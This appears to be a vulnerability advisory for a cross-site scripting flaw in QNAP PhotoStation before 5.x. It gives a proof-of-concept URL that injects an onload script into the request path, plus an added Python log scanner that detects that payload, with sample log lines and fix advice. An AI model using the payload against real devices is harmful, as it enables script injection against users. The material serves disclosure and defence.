QNAP PhotoStation versions prior to 5.x suffer from a cross site scripting vulnerability.
# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/
1. Description
Parameter validation is not implemented correctly in this application, so attackers can carry out an XSS attack against this web app.
2. Proof of Concept
https://[Site]:4443/photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php
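Added example, not part of the original advisory: a log check for the request shape shown in the proof of concept. It flags requests under /photo/ whose percent-decoded path contains an HTML tag opener. The log lines, the combined log format and the list.php name are constructed for illustration.

```python
import re

# Request line inside a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# A tag opener such as "<body" or "</script" has no place in a URL path.
TAG_RE = re.compile(r'<\s*/?\s*[a-zA-Z!]')
HEX_RE = re.compile(r'%([0-9a-fA-F]{2})')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is also caught."""
    for _ in range(max_rounds):
        decoded = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path(target, prefix="/photo/"):
    """Return the decoded path if it is under `prefix` and contains a tag, else None."""
    path = decode_fully(target.split("?", 1)[0])  # drop the query string
    if path.startswith(prefix) and TAG_RE.search(path):
        return path
    return None

def scan(lines):
    """Return (line_number, decoded_path) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            path = suspicious_path(match.group("target"))
            if path:
                hits.append((number, path))
    return hits

# Constructed sample log lines (addresses, timestamps and status codes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2018:10:00:01 +0000] "GET /photo/api/list.php?a=1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [22/May/2018:10:00:07 +0000] '
    '"GET /photo/api/inde%3Cbody%20onload=alert(%27XSSED%27);%3E.php HTTP/1.1" 404 310',
    '192.0.2.44 - - [22/May/2018:10:00:09 +0000] '
    '"GET /photo/api/inde%253Cbody%253E.php HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: markup in request path: {path!r}")
```

The same decoded-path test can sit in a reverse proxy or WAF rule in front of the NAS; on the application side, the fix is to HTML-encode any part of the request path that is written back into a response.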